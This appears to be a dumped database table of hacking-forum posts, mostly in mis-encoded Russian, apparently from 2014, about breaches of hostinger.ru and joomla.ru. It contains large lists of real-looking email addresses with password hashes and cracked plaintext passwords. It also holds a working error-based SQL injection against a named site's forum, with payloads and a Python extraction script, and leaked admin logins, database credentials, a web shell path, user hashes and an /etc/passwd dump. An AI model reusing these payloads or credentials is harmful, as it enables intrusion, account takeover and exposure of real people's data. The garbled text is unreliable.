a2za2z \r\nmr.taleh_55@mail.ru:68f5739d1a65ed274ddc619a8575dfda484ba792 4287979 \r\nngsayler@gmail.com:c9c526c43d46af188d22500a8494297431f2c507 6605477 \r\nyandexdenis@mail.ru:12caad1e858bb8262e870b906b191e38bcc48b6b 23582358 \r\nkwes.white-fox@yandex.ru:46819e8f6e9042b0cf3010288a2a2222cab3a22 \r\nw271821@gmail.com:7c4a8d09ca3762af61e59520943dc26494f8941b 123456 \r\ngrigap@list.ru:b6a62a9f675d923bd3e0b7b23183a58c74893698 08011944 \r\nuc7f@yandex.ru:a3d5834b68259584cd5fac61152fad9a7cb8127c optiplex \r\ntouche.sign@yahoo.com:9ca0e61ea1ec8fb4014ac7270fb54a5723d89330 02021980 \r\nzzfiles@hotbox.ru:1b3a43e7f7ee544c862d405940a2fa8651a5eb4a password0 \r\nakyla97@gmail.com:5207d2a4e39e21700180ccb45c4ddf9c2468299d star1997 \r\nalesichka1807@mail.ru:e07f8c4ab682212744526982f0f08d336e1c9041 forever \r\nainik-97@yandex.ru:de603e3050cb74ea4138356b592ca589653efc00 \r\nlara.nikon@gmail.com:6f2f8c6ffc8f98659eeb94505c84914f878fff9f \r\nmnpartner@yandex.ru:9c8ba7aac2e8c48de08978401bb9615e193b1541 226366 \r\naport95@gmail.com:b5b7e6d610b507f0044afe5ba11f2b127c63b230 \r\nyorg@email.ua:9c0d8ea3e73ad5a150e65ef8bd42ff0c2dec6d8b \r\nspider.company@yandex.ru:f3d664092a3811aef55a0c6c7568ddb99a08dde \r\ntrix12345@ya.ru:9b288cadda73c4efaa6912ab0974d6a0096f1fee 1708594 \r\nast1973@mail.ru:7c4a8d09ca3762af61e59520943dc26494f8941b 123456 \r\nk14m88@gmail.com:dbd6b8211cbe23c6a6b96be0a32ae31bbc7b3e0c lovenorsk \r\nfanistob@mail.ru:ed4f9045226e317860459370a9a9a306b3bf0104 \r\n0601422@gmail.com:a8e2d2802aeede56fafaf5ca12bad0439a1dee37 250361 \r\nhighberguk@hotmail.com:9ac20922b054316be23842a5bca7d69f29f69d77 1q2w3e \r\nidano@tut.by:9ac20922b054316be23842a5bca7d69f29f69d77 1q2w3e \r\nimagedog@yandex.ru:2151fad4ae1378548c5ae1b2398fd8360d1f2778 \r\nbumboks1000@yandex.ru:fabb9a4fec31835e7b6c95bb8ca6256d89e32785 4110549 \r\nsarkollk@gmail.com:d6d6954654e3f3ddbb297a51afa90729d987e2ae 3yhron2k \r\nprocs@myttk.ru:e55f6d97bd610ed802e8aecfdb8992ead0b86b0c w1j1kh1 \r\noly8ka@ya.ru:0963f40e462b4c78ce4c9de9a47881931a83ea1c 360978 \r\ne-fargus@mail.ru:b53b8144a249d4053d60c73add7925d636f0ffbc rambo01 \r\npupsendgold@gmail.com:817255ffa5a32ae8a93f41f3cb9fc42bc67a8536 EuAmwMpi \r\nruzofmo@gmail.com:acf550f37598d119f1d951abc8693a6c80f790cd google34253425 \r\nwildcold@yandex.ru:9f4999b8f2c23381852d17fc218e6d6e00525732 3797007 \r\ncpanele@yandex.ru:6af763524ac79d324110a17673f9d0f03f729754 09680968 \r\nekoeko52@gmail.com:c984aed014aec7623a54f0591da07a85fd4b762d 000000 \r\nuu4jkv@ua.fm:ffa6538c7da7fad23bc550afa2720eba12e1be9f 29582958 \r\nyorik@orc.ru:2151fad4ae1378548c5ae1b2398fd8360d1f2778 \r\nsilex3@ya.ru:3ac0130723c03d2be313d64039bfeeb0aba1f00f 210285 \r\nvkfilm.ru@gmail.com:6790da3c59cbab68c9d2ccccb62ab5de9aea01c4 222048 \r\nnicke-black@mail.ru:f58da09a09b54e71cf68fbd5a960af6f8b1f6ef0 wergraf222 \r\nigor.vla2011@yandex.ru:8e082c5c713eebaca3f57f9ade1961044349caf4 141297 \r\nablay2009@mail.ru:f1c84bd8dc959b19254632e42f63eb82680b8d35 meloman777 \r\nsserg@bigmir.net:be94152fa8b569d1b139f93cae50d6630541b67e NahtigaL \r\nferganec1@gmail.com:c1c79a6a6ecfad4178c96564bd25626ee7b57bad \r\nferganec@rambler.ru:334e9eb4952e38427afd4258736ea52176eb91db 220118122011 \r\nheureka.su@gmail.com:2c7cea9fda7f406e565dc81fbbcc7fca9899e9d6 Marseline-II \r\nissiakaev@gmail.com:48058e0c99bf7d689ce71c360699a14ce2f99774 121212 \r\nallaboutwe@mail.ru:64155a1fef1df04e35504dd7a1dd51c414929ce9 dadajon \r\nbelovdenis78@gmail.com:ee1b628bb8f577127c4fc1dcb02e5cea951bdf9b 14160916 \r\npxeboot@ya.ru:2cfe12364a6012e91cac427e6eb03109e9a0e0d2 fEMN47 \r\noshepkov.a@mail.ru:2ed36af0f543486163bb9c016f4d3f1e98f0d6a2 alez1966 \r\nsalvador2@mail.ru:cd0b3b337d6b87a7d820a7227dae6e9e4120ac4f zsxdcf \r\nilya.goylik@yandex.com:f6ca2859bca10d40cc496e355039b5fd48ae67c0 \r\nsargsyanrafo@mail.ru:a5f1bac3e5938c596b4fad3cce4a0fa98384a6bf 199502 \r\n[/code]', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1044, 1037, 1042, 'w0rm', 1, '', 1403410267, 'ÑрþôѠÿþ øýтõрýõту, ýðтúýуÃȄÂѠýð тðúþù òþт хþÑÂтøýó. Ã¥þÑÂтøýó úþýõчýþ ýõ ÑÂðüыù ûучшøù, ýð ÑÂðùтõ ñыûþ þñýðруöõýþ õщõ úучð XSS, ýþ òþт SQL øýъõúцøю, Ѡôðöõ ýõ þöøôðû ýðùтø.\r\n\r\nØôõü ýð фþруü ø öüõü \"ßþøÑÂú\"\r\nÚþô:\r\n[url]http://www.hostinger.ru/forum/search/[/url]\r\nÛюñþõ ÿþûõ ÿþôòõрöõýþ уÑÂ÷òøüþÑÂтø.\r\n\r\náþÑÂтðòÃȄÂõü ýðш ÷ðÿрþÑÂ:\r\n\r\nPHP úþô:\r\n[url]http://www.hostinger.ru/forum/search-advanced/subject=-1%[/url]\' OR 1 GROUP BY MID((SELECT email FROM forum_user LIMIT 0,1), FLOOR(RAND(0)*2), 64) HAVING AVG(0)-- -;keywords=;authors=;forums=null \r\nßõрõòþôøü õóþ ò base64, Ñ‚.ú.ÑÂúрøÿт õóþ ÿþ÷öõ ôõúþôøруõт:\r\nPHP úþô:\r\n[url]http://www.hostinger.ru/forum/search-advanced/c3ViamVjdD0tMSUnIE9SIDEgR1JPVVAgQlkgTUlEKChTRUxFQ1QgdGFibGVfbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hIGxpa2Uoc2NoZW1hKCkpIGxpbWl0IDIsMSksIEZMT09SKFJBTkQoMCkqMiksIDY0KSBIQVZJTkcgQVZHKDApLS0gLTs=[/url] \r\nÃËœ ò тðúþü òøôõ þтÿрðòÃȄÂõü ø ÿþûучðõü òыòþô:\r\n\r\nPHP úþô:\r\nDuplicate entry \'clients@hostinger.com\' for key \'group_key\'SELECT ftm.subject, ftm.message, ft.title, ft.slug, ft.id, f.slug as forum_slug, fu.email, fu.signature, ftm.user_id, ftm.created_at as forum_created_at, fu.created_at as user_register, fu.post_count as user_post_count, fu.name, f.* FROM `forum_forum_topic_message` ftm LEFT JOIN `forum_forum_topic` ft ON ftm.`forum_topic_id`=ft.`id` LEFT JOIN `forum_forum` f ON ft.`forum_id`=f.`id` LEFT JOIN `forum_user` fu ON ftm.`user_id`=fu.`id` WHERE ftm.`subject` LIKE \'%-1%\' OR 1 GROUP BY MID((SELECT concat_ws(email,pass,role) from forum_user limit 0,1), FLOOR(RAND(0)*2), 64) HAVING AVG(0)-- -%\' AND () \r\nßþ÷öõ ñыûþ þñýðруöõýþ, чтþ ÷ðÿрþѠüþöýþ ÑÂþúрðтøть, ôþ òþт тðúþóþ òøôð, þÑÂтðûьýыõ ÿõрõüõýýыõ þúð÷ðûøÑÂÑŒ ýõ тðú òðöýы ôûѠрðñþты ÑÂúрøÿтð:\r\n\r\nPHP úþô:\r\n[url]http://www.hostinger.ru/forum/search-advanced/subject=-1%[/url]\' OR 1 GROUP BY MID((SELECT concat_ws(0x3a,email,pass,role) from forum_user limit 0,1), FLOOR(RAND(0)*2), 64) HAVING AVG(0)-- -; \r\nÚþô:\r\n1d45462c3fd419acf408233f415160b276193bee:clients@hostinger.com:adm\r\nßðрþûь, üþöýþ уôðчýþ рðÑÂшøфрþòðть ýð рõÑÂурÑÂõ cmd5.ru\r\n\r\nÃÂôüøýøÑÂтрðцøѠрõÑÂурÑÂð þÿþòõщõýð þñ уÑÂ÷òøüþÑÂтø, ýþ ÷ðúрыòðть ÿþчõüу-тþ þýø õõ ýõ ÑÂÿõшðт.\r\n\r\nUPD áúрøÿт ôûѠуÿрþщõýýþù рðñþты.\r\n[code]\r\nPHP úþô:\r\n#-*- coding: utf-8 -*- \r\n__author__ = \'cat1vo\' \r\nimport urllib2 \r\nimport base64 \r\nimport re \r\n\r\nfor i in xrange(100): \r\n urlPart2 = \"subject=-1%\' OR 1 GROUP BY MID((SELECT concat_ws(0x3a,table_name,column_name) FROM information_schema.columns where table_schema IN (\'hg_db\') limit \"+ str(i) +\",1), FLOOR(RAND(0)*2), 64) HAVING AVG(0)-- -;\" \r\n url = \"http://www.hostinger.ru/forum/search-advanced/\" + base64.b64encode(urlPart2) \r\n req = urllib2.Request(url=url) \r\n go = urllib2.urlopen(req).read() \r\n regex = re.compile(\"Duplicate entry \'(.*?)\' for key\",re.MULTILINE|re.DOTALL) \r\n match = regex.findall(go) \r\n if match: \r\n print match[0] \r\n else: \r\n break \r\n[/code]', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1035, 1032, 0, 'w0rm', 1, 'Joomla.RU', 1403409115, 'Ûþüðõü þффøцøðûьýыù ÑÂðùт ôöуüûы ò руýõтõ ø трþÑÂýøü þффøцøðûьýую òõрÑÂøю ÿþô ÑÂõñÑÂ.\r\n\r\nØтðú, чõрõ÷ рõòõрѠÿþûучøû ÿþôôþüõýы:\r\n\r\n[code]\r\nagile.redsoft.ru\r\nart-bureau.com\r\ncss.redsoft.ru\r\ndocs.redsoft.ru\r\nhosting-test.ru\r\nhostingjoomla.ru\r\nimg.redsoft.ru\r\nimg1.redsoft.ru\r\nimg2.redsoft.ru\r\nimg3.redsoft.ru\r\nj-support.ru\r\njextension.org\r\njoom.es\r\njoomla-commerce.com\r\njoomla-commerce.ru\r\njoomla-dev.ru\r\njoomla-shopping.com\r\njoomla-shopping.ru\r\njoomla.ru\r\njs.redsoft.ru\r\njsupport.ru\r\nlinx.redsoft.ru\r\nmetro.redsoft.ru\r\nmetro2.redsoft.ru\r\nmy.redsoft.ru\r\nnamashine.redsoft.ru\r\nprodvijenie.su\r\nredsoft.ru\r\nrzds.redsoft.ru\r\nsandra.joomla.ru\r\nteam2.joomla.ru\r\ntechapp.redsoft.ru\r\ntrain1.redsoft.ru\r\nvideo.joomla.back\r\nvideo.joomla.ru\r\nvideo.joomla.rubak\r\nvideo.redsoft.ru\r\nwww.joomla-commerce.com\r\nwww.joomla-commerce.ru\r\n[/code]\r\n\r\nmetro.redsoft.ru - тут ûõöøт ÑÂтðрыù ôðüÿ ò úþрýõ, ÿðÑÂѠýð ðôüøýð \r\n\r\nadmin:qwerqwer\r\n\r\nÑрутøü...\r\n\r\ndocs.redsoft.ru/administrator/index.php\r\n\r\nadmin:1234\r\n\r\nÚðúþù-тþ üõýõôöõр ?\r\n\r\n_http://docs.redsoft.ru/jsys.php?action=FileView\r\n\r\nÛьёü шõûû:\r\n\r\n_http://docs.redsoft.ru/plugins/extension/exp.php\r\n\r\n\r\n public $host = \'localhost:\';\r\n public $user = \'docsredsoftusr\';\r\n public $password = \'5y9bMVAZ\';\r\n public $db = \'docsredsoftdb\';\r\n\r\n[code]\r\n62 Administrator admin info@joomla.ru 81dc9bdb52d04dc20036dbd8313ed055 Super Administrator 0 1 2011-06-29 01:37:09 2014-01-08 19:59:58 null null\r\n63 Ãâ€Ã¼Ã¸Ñ‚рøù áüøрýþò mitrich mitrich@redsoft.ru b385e98356b74c1dc313b4645628d6d0:fGWUrtooRcx2TAhqhJvwbCIbXq9FHZ6o null 0 0 2011-08-14 15:19:22 2012-04-03 04:44:28 null {\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"jce\",\"helpsite\":\"\",\"timezone\":\"\"}\r\n64 kadurban kadurban rudak777@gmail.com fb00458c16cbc00f78cbd6b1969ec83e:bkfaqGY3eRkl2UssF8TaE1jhZzRQ76Kq null 0 0 2011-08-14 15:26:28 2011-08-22 16:46:23 null {\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"jce\",\"helpsite\":\"\",\"timezone\":\"\"}\r\n65 ÚþûѠcourage nic.courage@mail.ru e17fa22183e5069f8e0326f5deb61f70:zH6uR3v4VrkqmsLUWRLdTbnuvbr5MK2l null 0 0 2011-08-14 15:26:46 2011-08-14 15:28:20 null {}\r\n66 Ãâ€Ã¸Ã¼Ã° GDV dimapc@gmail.com 0557cd9d083349497e228e4d6622957f:ipBUQO5EqRLg5gbQAqjGMcnei4Hjl9Bb null 0 0 2011-08-14 15:27:34 2011-08-14 15:28:53 null {\"editor\":\"tinymce\",\"timezone\":\"Europe\\/Kiev\",\"language\":\"\"}\r\n67 pavlik ozon346 zpo96@mail.ru da7e28deb44f58e76abbe9fec70da027:uEfnnCfbM7tA4WxFyIHGf7ELUOxNVvxG null 0 0 2011-08-14 15:28:06 0000-00-00 00:00:00 null {}\r\n68 lena lena elena@redsoft.ru 0de8c6dddb28b4f2b354034603cfae93:9JVE1AOyzQ2iVoFeKxY9veynb4Uxa9vi null 0 0 2011-08-14 15:28:49 2011-08-14 15:29:56 null {}\r\n69 ÃÂûõúÑÂðýôр ÛõýÑÂúøù shelter shelter-1988@yandex.ru e300598daec3039c59b2308b4bcb880c:EjXW3DQn5y94ZkFtAKBnEKGx6QvC9uHT null 0 0 2011-08-14 15:32:17 2011-08-23 16:48:22 null {\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}\r\n70 èÿрþтð shprota shprota@Gmail.com 6837a1832e94b13835d7da19700ada5c:9luwDtyUa3ArZG79xneCUtHbtFkHOlMx null 0 0 2011-08-14 15:38:35 2011-08-14 15:57:01 null {\"editor\":\"\",\"timezone\":\"Asia\\/Jerusalem\",\"language\":\"\"}\r\n71 à õýðт aha agavatest@list.ru 1d63314ab50118898c492a968bf06b46:X895IoGD5H9xiOLKRUuzaY4yCykvcHha null 0 0 2011-08-14 16:29:48 0000-00-00 00:00:00 null {}\r\n72 Dimka dimka dguryev@gmail.com bcba879100492029f8362e9a8b5b61df:CsTHbYAPIBAezV3s2SHh0vCRwlDRbZtb null 0 0 2011-10-25 09:48:26 2011-10-25 09:51:29 null {\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}\r\n[/code]\r\n/etc/passwd \r\n\r\n[code]\r\n...space:x:532:527:space:/home/space/data:/bin/date\r\nredsoft:x:544:539:redsoft:/home/redsoft/data:/bin/date\r\nolegind:x:1005:1005:olegind:/home/olegind/data:/bin/date\r\nmgutu21:x:1006:1006:mgutu21:/home/mgutu21/data:/bin/date\r\nartburo:x:1016:1016:artburo:/home/artburo/data:/bin/date\r\nredsoft_new:x:1039:1039:redsoft_new:/home/redsoft_new/data:/bin/date\r\ntbm:x:1041:1041:tbm:/home/tbm/data:/bin/date\r\ntbm-site:x:1042:1042:tbm-site:/home/tbm-site/data:/bin/date\r\nart1:x:1046:1046:art1:/home/art1/data:/bin/date\r\nart-bureau:x:1047:1047:art-bureau:/home/art-bureau/data:/bin/date\r\nux-design:x:1048:1048:ux-design:/home/ux-design/data:/bin/date\r\nstrds:x:1049:1049:strds:/home/strds/data:/bin/date\r\nagileredsoft:x:1050:1050:agileredsoft:/home/agileredsoft/data:/bin/date\r\nprotosredsoft:x:1051:1051:protosredsoft:/home/protosredsoft/data:/bin/date\r\nsandrajoomla:x:1052:1052:sandrajoomla:/home/sandrajoomla/data:/bin/date\r\ncrmredsoft:x:1053:1053:crmredsoft:/home/crmredsoft/data:/bin/date\r\ndesignredsoft:x:1054:1054:designredsoft:/home/designredsoft/data:/bin/date\r\ndevjoomla:x:1055:1055:devjoomla:/home/devjoomla/data:/bin/date\r\ndevredsoft:x:1056:1056:devredsoft:/home/devredsoft/data:/bin/date\r\ndocsredsoft:x:1057:1057:docsredsoft:/home/docsredsoft/data:/bin/date\r\nhostingjoomla:x:1058:1058:hostingjoomla:/home/hostingjoomla/data:/bin/date\r\nj-support:x:1059:1059:j-support:/home/j-support/data:/bin/date\r\njextension:x:1060:1060:jextension:/home/jextension/data:/bin/date\r\njoom_es:x:1061:1061:joom_es:/home/joom_es/data:/bin/date\r\njoomlacommerce:x:1062:1062:joomlacommerce:/home/joomlacommerce/data:/bin/date\r\njoomlacomm:x:1063:1063:joomlacomm:/home/joomlacomm/data:/bin/date\r\nportal:x:1064:1064:portal:/home/portal/data:/bin/date\r\nkausa:x:1065:1065:kausa:/home/kausa/data:/bin/date\r\ninnerproj:x:1066:1066:innerproj:/home/innerproj/data:/bin/date\r\njoomlaru:x:1067:1067:joomlaru:/home/joomlaru/data:/bin/date\r\nsurikov:x:1068:1068:surikov:/home/surikov/data:/bin/date\r\namzonlexx:x:1069:1069:amzonlexx:/home/amzonlexx/data:/bin/date\r\nhosting:x:1070:1070:hosting:/home/hosting/data:/bin/date\r\nbitrix1:x:1071:1071:bitrix1:/home/bitrix1/data:/bin/date\r\nbm:x:1072:1072:bm:/home/bm/data:/bin/date\r\nbpc:x:1073:1073:bpc:/home/bpc/data:/bin/date\r\nfsff:x:1074:1074:fsff:/home/fsff/data:/bin/date\r\nhosting-admin:x:1075:1075:hosting-admin:/home/hosting-admin/data:/bin/bash\r\nhotels:x:1076:1076:hotels:/home/hotels/data:/bin/date\r\njoomla30joomlaru:x:1078:1078:joomla30joomlaru:/home/joomla30joomlaru/data:/bin/date\r\nkadurdomain:x:1079:1079:kadurdomain:/home/kadurdomain/data:/bin/date\r\nkayako:x:1080:1080:kayako:/home/kayako/data:/bin/date\r\nlovebabyfoot:x:1082:1082:lovebabyfoot:/home/lovebabyfoot/data:/bin/date\r\napplesport:x:1084:1084:applesport:/home/applesport/data:/bin/date\r\ncrm:x:1085:1085:crm:/home/crm/data:/bin/date\r\nexcursion:x:1087:1087:excursion:/home/excursion/data:/bin/date\r\nfishing:x:1088:1088:fishing:/home/fishing/data:/bin/date\r\nmmabazar:x:1089:1089:mmabazar:/home/mmabazar/data:/bin/date\r\nnewprobladimir:x:1090:1090:newprobladimir:/home/newprobladimir/data:/bin/date\r\n[/code]\r\nÃÂð þчõрõôø þффøцøðûьýыù ÑÂðùт\r\n\r\njoomlaru:x:1067:1067:joomlaru:/home/joomlaru/data:/bin/date\r\n\r\nà÷ýðчøт ÿуть /home/joomlaru/data/www/joomla.ru/\r\n\r\nÚþÿðõü...', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1041, 1037, 1040, 'w0rm', 1, '', 1403409851, 'more ....\r\n\r\n[code]\r\nwork_09@bk.ru:1b2199551bab25e39001270fc30fc1193cc20b67 \r\ntea88_izhab@mail.ru:0af66b0e511dd5179c5edc3987555ab8169b986b Rfnz88 \r\na.desyatkin@mail.ru:f21257f55c496087d83641d3953189c458471887 3575315 \r\napollo440by@gmail.com:69a14c844125440362b80954272b6fab33b48847 44003042 \r\nzhalek@yandex.ru:636a1c45e303b6ecd81d0c24eac6087f947fbdb9 alex1994 \r\n11.02.90@mail.ru:b8d7a155a97644f9d9786731d27cc3e6508f0d7f cegth gfhjkm \r\nm_stogav@mail.ru:dcf4912f5cac39482fc3c0e884eeb5ee35caee31 \r\npostmail@list.ru:3a960464d36c1b8bad183ed57ee79c0e39953cce Aa123456 \r\nRusl-lezgin91@yandex.ru:da3614b69ac944e562e2187a4eb8d0ee3e3f46e3 19910906 \r\nsereza.torlopov@yandex.ru:a1333580831fd10b95d12824e4b1eeca427371 \r\nminace002@mail.ru:4928c4cc50374bb35f0f7e5f3cc17f69d9ab58ea wert1995 \r\nSaV4iK.92@mail.by:5579bf093f06f592be89c15841163379c3a19169 7379992 \r\nulver.ussr@gmail.com:0209c5aa8f5e5fb8dc3d683e840390694cbc4cb8 death123 \r\ncresta137@mail.ru:65e21ea0de8852abc2b0d821c1f9ac6f2cd5bd98 QWERTY \r\nandrew_romanov@inbox.ru:efb3de7d119b5b006a84fa65d2cefd7a5b206a3c 522043 \r\nshishihado.ragnarok@gmail.com:efa786d1aadf84482e02bf1778d14e84d1 \r\nmr.freax@ukr.net:e0d1c3ea85768b0957a63bbb5375795a5615d11b 30091994 \r\nigmihr@narod.ru:5e386b565d3ae4c30244dad0ba09889a91071b3d 01031958 \r\nguggl@mail.ru:35b9215800c9056dda5c4edcf483a86bba446402 l1o2g3o412 \r\nNUST2@yandex.ru:8f75dc592efb1107c9b0f11eb3466d25aca44a23 HFNFNEQ1 \r\ntoto44@inbox.ru:188ca560e43d0d2d4c080ecd4853f0d5c0f1bfbf toto44 \r\nmail.1989@list.ru:05ce005e51661c2cff21dfac382579c5dd9cb6f7 \r\nsasharepin@mail.ru:c56ae4ba1d248e09c50eeee5d17872c5837f13ad xc3z4389 \r\npishite_budu_rad@mail.ru:e9b23593d4e8d682e1f1f8bcfac321f03506fc9 \r\nden_master@list.ru:4f26aeafdb2367620a393c973eddbe8f8b846ebd master \r\nfakex86@mail.ru:c7ddede5182e7f64d28c3bc7b9cb28b791cd0ec9 fylhtq \r\nshumski2@yandex.ru:dd5fef9c1c1da1394d6d34b248c51be2ad740840 654321 \r\narvavin@bk.ru:dbbec91b24cf1d1ae2776077219fdf8479032f09 135790 \r\nrelizer@live.ru:6ca25ec5c44c9c56f5fdc859a5b9d8449f4f9baa 000089 \r\nSAPER1985@gmail.com:089478e22518ebe980d682baef5896ce9ea2f0ce samara \r\naaa220@yandex.ru:4fe27228a786f200d99533500d5098a74f1a2578 njkzy12345 \r\npetuhoff@gmail.com:c795bdb81e0dbea8f916114b4f754329da61a090 \r\nkurah@list.ru:bd8696feb93d7ad7a13a4d66d267bfad1a1808d9 \r\ngrl_stemka8896@rambler.ru:dcb075d2f1c31bf77bcd6a4cf5115376f055e7 \r\nkolodchakmykola@mail.ru:dfc5ecb2242690ba6fd785ad1283a4c31bb15188 \r\nabahgpad@gmail.com:dd07a9e7849c9185e965c973da3b8e853c8e3658 065490 \r\noleg.hard@gmail.com:68e65205cc015c657fbf814e0ff61943b1961705 oleg0912 \r\nandrey.sin98@gmail.com:4ba0d9b6fbe27d85c1477608f72a8d8dea4ca1d8 19981976 \r\nsergej4711@gmail.com:482de1146eecc4ef5dceb0a786dc6cd2fd216dfb caca1971 \r\nwowlifeaportal@gmail.com:48058e0c99bf7d689ce71c360699a14ce2f9977 \r\na_serg81@mail.ru:2a7867ffd5f3a7479660ad5463931f95af36e792 \r\nandrew301@mail.ru:d1173f9f279386b4f034eff359a8d019fe7b04f6 9937879 \r\n4ypakabra90@mail.ru:95b79d548b788657e274ce72aecc8ee7f8853914 vfrcbv08071990 \r\ndmitriy_ad@vseti67.com:37df8921f97bbf699e924a4fc3a8880f3f76b356 350639 \r\ninicoo@mail.ru:e1b51c5a45519712ca7beb08a03c8176fd7c73ef 147258369v \r\nrybius.m@gmail.com:423c5cade1cea399c025e272a7853428dbbe08e5 \r\nterraelementum@mail.ru:74a44a265def9c62da4b0b5e0304deda67815ac6 19788791 \r\ntonukask@mail.ru:1e56318276e597fb502a696071e170c501066af3 \r\nvadimarkovv@gmail.com:fa4257dacd70b76d3285ab9bc6bfcbaab2579933 \r\nhelkorih@yandex.ru:9f7d986f2c8dd14ee892a1fffbe4e8ca82c77cf4 3489528 \r\nturbo-drive@autorambler.ru:11e8345f33f3e4632464d5b97afc1b66f7c50 \r\nartur.221075872@gmail.com:585ddb57afc200a4945aad5108ff5823240efb \r\ndeleted-qweqwe@yandex.ua:a642a77abd7d4f51bf9226ceaf891fcbb5b299b \r\nevgeniy.zabolotniy@yandex.ua:eddbff88a6636ec72810a0c7a588b466765 \r\nalecsandvamaria@mail.ru:ea0ed66e3c7bf762fb464d0078d8ecef5d4bf14c ZadyNu \r\nriva257@gmail.com:24298c348de4de25659d304d363693bf519813e5 \r\nLeha_6d@mail.ru:6ab546dc619d1903e64578694a9748dd361f1984 666666d \r\ns.b.mashevsky@mail.ru:c1d145fd2535c3c2f0c29c4da19ea7ddd6044118 17031957 \r\nnbuhtarma@bk.ru:34459f11b180f65359e9e0c37afc693fb726a15f d3502712 \r\nrael@list.ru:3bedada588175a6e10fc6f8eda065ade2b7e4c52 \r\ndefender5x@yandex.ru:c7d11ab294e2e41a68ced3e315f222f2cf412cad 259440 \r\nnarush.85@mail.ru:c9b7a26e979f047e4d0574109a59fd1a08231a7f eghfdf123 \r\nantanariva@gmail.com:c08a0b71cd7581cdafe05af5cc34fdbbcb004426 \r\nbarkers96@mail.ru:6344a62bf0cdce7402f2771434e2522772a20484 123zebra \r\nvlad05966@gmail.com:2c030636bc76c095e3c8c6a62fe5019bb871ca95 migal05 \r\nGallants-Css@mail.ru:c976fdc3e5652c9d85b1f65d74504f298a3a41dc \r\npersonasmail@yandex.ru:e3b1e22a31311dd056741080985f8527654dc24d 89148342245 \r\nzaikin_s@mail.ru:ea9e93c2685437717547fe28a61f2b956ef22cd9 55532114 \r\nizgoi684@yandex.ru:8b711cb0f2dd1319bc5390c098785a56ea6a2e42 \r\nmakc.nazarenko@mail.ru:7e04d37cf8340589b471ec1c004883af369ab106 zyjxrf \r\nsmile.smile666@inbox.ru:fee94704202f90c0f8305fc6ce8b91c773531d6c 19881988 \r\nppp-isakovo@mail.ru:6c4ba96bf924a7817581673c67cf0a112ff2b068 sov123 \r\ndenya95@voliacable.com:56f5ab254fd3c496b27281ba6be690ac7a299380 guard531 \r\nmaxgossy@tut.by:25d464bddf227242ac1a9f1af89efb2871f89cd0 131213 \r\nPortik_suslikov@mail.ru:feb08a731871e257d01b20a10235f994038a64be e4k5l6m7n8 \r\nmediaz@mail.ru:f7baa99a4a086de5afa9d7ad764b549707e02f99 854283699 \r\nvl.bikineev@gmail.com:fb07f1d3ad31e85545ae566cb057a90a88635f9c \r\nwebadmin@xaris.ru:3b2b1470cdda6d6d7dbb53b73f0f62b1414ffb97 260183 \r\nvasyutok@ya.ru:909d8523f7f0aea4112830027909bb01a48989e5 \r\n[/code]', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1040, 1037, 0, 'w0rm', 1, 'hostinger.ru/auth', 1403409811, 'activation_code,id,email,hash,pass\nðúúðуýты Ñ [url]http://www.hostinger.ru/forum/[/url]\n\nчõúðõü ò:\n\n[url]http://cpanel.hostinger.ru/auth[/url]\n[code]\nXCB3z3Yo:1: \nclients@hostinger.com:1d45462c3fd419acf408233f415160b276193bee namas12 \nsupport@chavo.com.ua:7288edd0fc3ffcbe93a0cf06e3568e28521687bc test123 \nvytautas.av@gmail.com:7c4a8d09ca3762af61e59520943dc26494f8941b 123456 \nthvan@ukr.net:169d85bb285fd9ae479b7040dafdd12f7d1575d5 hvan1933 \nalexlpchb@gmail.com:60beb075955b62cb5057e9cb64010dcf85114f40 280586qq \nradovanski@gmail.com:935e4d62dfb0834c562e8ff11f70ce22d67ec5d6 \nmobiles-china@yandex.ru:e30a83cc3a6473fbe7b3c5f99f92865e61a1f55e 4815162342 \nnikitastepanov2003@hotmail.com:bc7319ad3e4f22438ef470323ba3580ca \naleksandr-babinov@mail.ru:ec04ec25f9a218f211527399280b6d2cc44bd0 \nnkropivnaya@mail.ru:128bd907112ec179dd4488aa9b6acabb581aee04 \ntdarkona.spb@gmail.com:a6977c6257b5b65942c3973449d6f851f8c614bd 21052005 \nm.lukyanov@rambler.ru:dfc3cfa738b2b4fec282cbe181e84d868c213fe2 poiuytrewq \nhappythefriends@e-mail.ua:38c6ea9fc07bf015de8266b017cb5724dedf6b \nchenk0@mail.ru:1628b77f15863b302de195f7d3b278787ce3bb0c \niljin-aleksandr@yandex.ru:bbd0ffa71bab5dc0a12d836b738f63ca98bf09 \nMisha.111292@mail.ru:b8ef1de941498a52fd463411f09b22dfe580d92f 543257 \nshidow@mail.ru:79b1af902ba8f49ccdfff1eab9a1eea3ec42d420 ptybn96 \nantn-ladyk@mail.ru:47b6e89e32b14ef12ec2e8c30c1d38b7c3b4d838 \nchipvologda@mail.ru:616c70dfea13b1dbf8f62779f52207cd612af102 9115021136 \nbern97@mail.ru:b180edac6143616cf5e64b11a2f9192683b31389 s1s1s1 \nintox93@yandex.ru:3449b966bfe119d99ea12ac4b4a01b7126845928 \naragorn_19_90@mail.ru:8e52a999d2261a9d3b132b33a084a301360f0aa1 \nsawagalkin@gmail.com:351783e876e60b0c600fb218057c7f9aa3e60307 Alexandr \n399525@inbox.ru:a909ed15a84ee84638ae5c2853d480b2006619eb 5065437 \nsch17.tk@gmail.com:bdd814b4ca743726640791a46a11f0aba12fc471 78987y786 \n000ru.tk@gmail.com:554859a2d50516f131346a9d99fca4d51776d032 \nadmin@remontcity.org.ru:36f0b52d97f0e0c639c1c9f426e8e3ea55ad3bfe kunicina \nctc1@mail.ru:a47cd3afb2fe2091c917d6b2283d69137f8ab7ab 123459 \nandrey.gorov@gmail.com:7288edd0fc3ffcbe93a0cf06e3568e28521687bc test123 \nanatoliy.borkiy@gmail.com:7288edd0fc3ffcbe93a0cf06e3568e28521687 \nyuriy.carpov@gmail.com:7288edd0fc3ffcbe93a0cf06e3568e28521687bc test123 